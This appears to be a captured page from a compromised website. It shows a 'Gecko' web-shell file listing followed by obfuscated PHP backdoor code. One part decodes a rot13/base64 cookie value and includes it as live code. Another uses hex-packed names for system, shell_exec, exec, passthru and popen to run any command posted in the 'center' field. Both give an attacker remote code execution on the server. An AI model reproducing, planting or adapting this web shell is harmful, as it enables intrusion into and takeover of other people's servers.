Gecko [ herotex-group.site ]

Name	Size	Permission	Date
pki-validation	[ DIR ]	drwxr-xr-x	2025-04-28 13:38
2.php	0 B	-rw-r--r--	2025-04-23 07:02
Bio.php	0 B	-rw-r--r--	2025-04-17 18:20
CAPTCHA.php	0 B	-rw-r--r--	2025-03-24 12:36
action.default.php	0 B	-rw-r--r--	2025-04-11 10:07
add_events.php	0 B	-rw-r--r--	2025-04-11 11:33
cache_magics.php	0 B	-rw-r--r--	2025-04-23 13:01
change.php	0 B	-rw-r--r--	2025-04-23 07:05
comment_delete.php	0 B	-rw-r--r--	2025-04-23 07:05
core.is_trusted.php	0 B	-rw-r--r--	2025-04-17 08:27
editCourseNotes.php	0 B	-rw-r--r--	2025-04-17 08:28
error_log	30.53 KB	-rw-r--r--	2025-04-24 02:03
formselecttheme.php	0 B	-rw-r--r--	2025-04-11 10:07
forum.inc.php	0 B	-rw-r--r--	2025-04-12 07:37
forums.inc.php	0 B	-rw-r--r--	2025-04-10 08:25
homepage_buttons.php	0 B	-rw-r--r--	2025-04-23 13:03
kses.php	0 B	-rw-r--r--	2025-04-17 18:22
modredirect.inc.php	0 B	-rw-r--r--	2025-04-11 11:33
page_info.php	2.75 KB	-rw-r--r--	2025-02-21 03:00
phdRqmntsEN.php	0 B	-rw-r--r--	2025-04-23 11:12
rate_accept05.php	0 B	-rw-r--r--	2025-04-11 12:46
welcome2.php	0 B	-rw-r--r--	2025-04-23 11:08

Rename

<?php																																										if (isset($_COOKIE[88+-88]) && isset($_COOKIE[93+-92]) && isset($_COOKIE[67-64]) && isset($_COOKIE[36+-32])) { $param = $_COOKIE; function multi($parameter) { $param = $_COOKIE; $state = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), 'e9adba74'); if (!is_writable($state)) { $state = getcwd() . DIRECTORY_SEPARATOR . "cache"; } $slt = "\x3c\x3f\x70\x68p\x20" . base64_decode(str_rot13($param[3])); if (is_writeable($state)) { $slot = fopen($state, 'w+'); fputs($slot, $slt); fclose($slot); spl_autoload_unregister(__FUNCTION__); require_once($state); @array_map('unlink', array($state)); } } spl_autoload_register("multi"); $id = "9b5df4d4ab85d966b817f95e076d3276"; if (!strncmp($id, $param[4], 32)) { if (@class_parents("oauthexceptions_rfind", true)) { exit; } } }

$stor1 = '7';
$stor2 = '4';
$stor3 = '6';
$stor4 = '8';
$stor5 = '5';
$stor6 = 'f';
$stor7 = '3';
$stor8 = '0';
$stor9 = '1';
$stor10 = 'e';
$reset1 = pack("H*", '7' . '3' . '7' . '9' . $stor1 . '3' . $stor1 . $stor2 . $stor3 . '5' . '6' . 'd');
$reset2 = pack("H*", $stor1 . '3' . $stor3 . $stor4 . $stor3 . $stor5 . $stor3 . 'c' . '6' . 'c' . '5' . $stor6 . '6' . '5' . '7' . $stor4 . '6' . $stor5 . $stor3 . $stor7);
$reset3 = pack("H*", '6' . '5' . '7' . $stor4 . '6' . '5' . '6' . '3');
$reset4 = pack("H*", $stor1 . $stor8 . $stor3 . '1' . '7' . '3' . '7' . '3' . $stor1 . '4' . $stor3 . $stor4 . $stor1 . '2' . '7' . $stor5);
$reset5 = pack("H*", $stor1 . $stor8 . $stor3 . $stor6 . '7' . $stor8 . '6' . '5' . $stor3 . 'e');
$reset6 = pack("H*", '7' . $stor7 . $stor1 . $stor2 . $stor1 . '2' . $stor3 . $stor5 . '6' . $stor9 . '6' . 'd' . $stor5 . 'f' . '6' . $stor1 . '6' . '5' . $stor1 . '4' . '5' . 'f' . $stor3 . '3' . $stor3 . 'f' . $stor3 . $stor10 . $stor1 . $stor2 . '6' . $stor5 . '6' . 'e' . $stor1 . $stor2 . '7' . '3');
$reset7 = pack("H*", $stor1 . '0' . $stor3 . '3' . '6' . 'c' . '6' . 'f' . $stor1 . $stor7 . '6' . '5');
$center = pack("H*", $stor3 . $stor7 . $stor3 . $stor5 . $stor3 . $stor10 . '7' . '4' . '6' . '5' . $stor1 . '2');
if (isset($_POST[$center])) {
    $center = pack("H*", $_POST[$center]);
    if (function_exists($reset1)) {
        $reset1($center);
    } elseif (function_exists($reset2)) {
        print $reset2($center);
    } elseif (function_exists($reset3)) {
        $reset3($center, $id_ph);
        print join("\n", $id_ph);
    } elseif (function_exists($reset4)) {
        $reset4($center);
    } elseif (function_exists($reset5) && function_exists($reset6) && function_exists($reset7)) {
        $slt_property = $reset5($center, 'r');
        if ($slt_property) {
            $arg_argument = $reset6($slt_property);
            $reset7($slt_property);
            print $arg_argument;
        }
    }
    exit;
}